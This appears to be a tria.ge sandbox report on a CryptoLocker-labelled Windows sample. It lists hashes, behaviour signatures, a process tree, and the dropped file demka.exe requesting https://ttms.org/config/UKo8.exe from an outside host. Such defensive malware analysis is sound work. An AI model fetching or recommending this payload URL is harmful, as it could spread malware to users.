Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

2024-05-12...er.exe

windows7-x64

9

2024-05-12...er.exe

windows10-2004-x64

9

Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    12/05/2024, 04:56 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2024-05-12_d93f10acc1f50f66fdbe0765adaa431d_cryptolocker.exe

  • Size

    33KB

  • MD5

    d93f10acc1f50f66fdbe0765adaa431d

  • SHA1

    4d33c1e395c3bc431df1b3b32dec581fc0be09ac

  • SHA256

    bde07b6acf3efbc1854976b5a54401efacd8ceb2a414c7b8547859e8c87fd050

  • SHA512

    d60eaf61ca15732f3a51481f25d603dc7a705b03468d47b09ac1221f62deb010eb3ab523fc0d6e2fcf94004a59e10ea4e6544234e33e33a75fa46c04a1d5c429

  • SSDEEP

    384:bAvMaNGh4z7CG3POOvbRSLoF/F0QU5XYFnufc/zzo6cJ3v7yB:bAvJCYOOvbRPDEgXRcJG

Score
9/10

Malware Config

Signatures

  • Detection of CryptoLocker Variants 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-05-12_d93f10acc1f50f66fdbe0765adaa431d_cryptolocker.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-05-12_d93f10acc1f50f66fdbe0765adaa431d_cryptolocker.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:1712
    • C:\Users\Admin\AppData\Local\Temp\demka.exe
      "C:\Users\Admin\AppData\Local\Temp\demka.exe"
      2⤵
      • Executes dropped EXE
      • Modifies system certificate store
      • Suspicious use of UnmapMainImage
      PID:1860

Network

  • flag-us
    DNS
    ttms.org
    demka.exe
    Remote address:
    8.8.8.8:53
    Request
    ttms.org
    IN A
    Response
    ttms.org
    IN A
    35.215.114.222
  • flag-us
    GET
    https://ttms.org/config/UKo8.exe
    demka.exe
    Remote address:
    35.215.114.222:443
    Request
    GET /config/UKo8.exe HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Host: ttms.org
    Cache-Control: no-cache
    Response
    HTTP/1.1 202 Accepted
    Server: nginx
    Date: Sun, 12 May 2024 04:56:55 GMT
    Content-Type: text/html
    Content-Length: 186
    Connection: keep-alive
    SG-Captcha: challenge
    X-Robots-Tag: noindex
    Set-Cookie: nevercache-b39818=Y;Max-Age=-1
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Cache-Control: no-store,no-cache,max-age=0
    Host-Header: 8441280b0c35cbc1147f8ba998a563a7
    X-Proxy-Cache-Info: DT:1
  • 35.215.114.222:443
    https://ttms.org/config/UKo8.exe
    tls, http
    demka.exe
    910 B
     4.6kB
     8
    7

    HTTP Request

    GET https://ttms.org/config/UKo8.exe

    HTTP Response

    202
  • 8.8.8.8:53
    ttms.org
    dns
    demka.exe
    54 B
     70 B
     1
    1

    DNS Request

    ttms.org

    DNS Response

    35.215.114.222

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • \Users\Admin\AppData\Local\Temp\demka.exe
    Filesize

    33KB

    MD5

    cc30815ce62fd95d9870a2c6afb930cb

    SHA1

    af85301447e711fa173360b34999fb5d653f123e

    SHA256

    10e3258c851f0311129eba7ccbbb68c6df18508bfabec119a79cc8d07b4e46da

    SHA512

    2a4e05a7488d91e5a0df8e2249dcc7692d9b9703b99fe55f44b50547cc2442ba84af1381c99f6d2dc08151d01ec40a75a061ec33c5e57a1c778b2d22eed6676a

    Download Submit

  • memory/1712-0-0x0000000000300000-0x0000000000306000-memory.dmp

    Filesize

    24KB

    Download

  • memory/1712-8-0x0000000000300000-0x0000000000306000-memory.dmp

    Filesize

    24KB

    Download

  • memory/1712-1-0x0000000000400000-0x0000000000406000-memory.dmp

    Filesize

    24KB

    Download

  • memory/1860-23-0x00000000005D0000-0x00000000005D6000-memory.dmp

    Filesize

    24KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.